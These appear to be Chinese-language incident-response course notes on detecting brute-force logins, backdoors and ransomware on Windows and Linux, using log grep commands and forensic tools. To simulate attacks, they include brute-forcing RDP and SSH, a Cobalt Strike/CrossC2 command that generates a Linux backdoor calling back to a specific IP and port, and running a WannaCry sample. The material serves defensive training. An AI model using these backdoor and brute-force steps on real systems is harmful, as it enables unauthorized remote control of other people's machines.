应急响应-win&linux分析后门&勒索病毒&攻击

QQ截图20220530092353.jpg

  1. 常见危害
  • 暴力破解
  • 漏洞利用
  • 流量攻击
  • 木马控制(Webshell,PC 木马等)
  • 病毒感染(挖矿,蠕虫,勒索等)
  1. 常见分析
  • 计算机账户
  • 端口
  • 进程
  • 网络
  • 启动
  • 服务
  • 任务
  • 文件等安全问题

补充资料

病毒分析

病毒查杀

病毒动态

在线病毒扫描网站

攻击响应-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion

  • 事件归类
  • 事件 ID
  • 事件状态等
  • 参考百度资料

Linux-grep 筛选

#1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c

#2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1

#3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr

#4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

#5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

案例演示1-windows日志查看

windows日志位置

QQ截图20220530100104.jpg

windows自带日志工具不好用,查找分析不方便,推荐使用插件LogFusion

QQ截图20220530100127.jpg

LogFusion载入应用程序、硬件事件、安全、系统等日志

QQ截图20220530100155.jpg

使用弱口令工具进行暴力破解(选择RDP协议),模拟攻击

QQ截图20220530100214.jpg

在安全日志里看到很多账户登录失败的日志,可以判断当前主机遭受了爆破攻击,以及是否成功等

QQ截图20220530105501.jpg

双击进入,查看详细信息(可以看到是哪个IP地址爆破密码成功,成功登录了本机)

QQ截图20220530105523.jpg

案例演示2-linux日志查看

linux日志位置

QQ截图20220530105549.jpg

首先使用弱口令工具进行暴力破解(选择SSH协议),模拟攻击

QQ截图20220530105606.jpg

linux日志分析,使用grep筛选

QQ截图20220530105626.jpg

控制响应-后门木马(Webshell,PC)-Win,Linux

CS借助CrossC2项目上线linux主机过程

  1. 项目上传至服务端目录,给予执行权限
  2. 配置监听器:windows/beacon_https/reverse_https阿里云记得端口放行
  3. 生成后门:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2通过网络监听工具及 windows 日志分析或执行记录查找后门问题

案例演示1-windows分析

windows执行木马,CS上线,模拟攻击

QQ截图20220530110259.jpg

TCPView工具,可以查看哪个进程与远程IP通信过,从而确定系统是否曾经遭受过攻击。但是这个软件不太好用,上一步执行过的artifact.exe木马都没筛选出来。

QQ截图20220530110322.jpg

Process Explorer工具,可以查看分析进程

QQ截图20220530110416.jpg

PCHunter工具。缺点是,windows高版本网络信息,获取不全。比如木马在windows7执行后,该工具可以获取网络信息,如下图。但是同一木马在windows2018执行后,该工具获取不到网络信息

QQ截图20220530110455.jpg

UserAssistView工具,可以看到所有在windows系统上执行过的文件

QQ截图20220530110513.jpg

logonsession工具,可以看到当前主机有哪些会话连接过,从而分析有没有过远程攻击

QQ截图20220530110535.jpg

autoruns工具,可以查看windows系统的自启动项目,从而发现是否有木马病毒等

QQ截图20220530110557.jpg

案例演示2-linux分析

  • CS是windows渗透工具,但是后期经过一些插件的开发,CS也可以上线linux系统,比如CS借助CrossC2项目上线linux主机

项目上传至服务端目录,给予执行权限

QQ截图20220530110825.jpg

QQ截图20220530110836.jpg

配置监听器:windows/beacon_https/reverse_https阿里云记得端口放行

QQ截图20220530110857.jpg

生成后门:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2

QQ截图20220530111005.jpg

将后门上传到linux主机并执行

QQ截图20220530111019.jpg

CS成功上线

QQ截图20220530111036.jpg

危害响应-病毒感染(勒索 WannaCry)-Windows

勒索病毒解密网站

下载勒索病毒样本,在虚拟机上执行(不要在本机执行,谨慎执行)

QQ截图20220530111519.jpg

中毒后显示如下

QQ截图20220530111536.jpg

打开任何文件都乱码,弹框

QQ截图20220530111600.jpg

可以使用360勒索病毒解密网站进行病毒查询、在线解密等

QQ截图20220530111615.jpg

也可以使用nomoreransom网站尝试解密

QQ截图20220530111635.jpg

自动化响应检测-Gscan 多重功能脚本测试-Linux

自动化响应检测工具:GScan、chkrootkit、rkhunter、lynis

执行Gscan脚本

QQ截图20220530111749.jpg

可以看到,黑客进行了哪些攻击行为,是否成功等

QQ截图20220530111806.jpg

netstat -ntl可以查看tcp端口等,再通过ps命令找到对应的进程,分析其是否是木马病毒

QQ截图20220530111825.jpg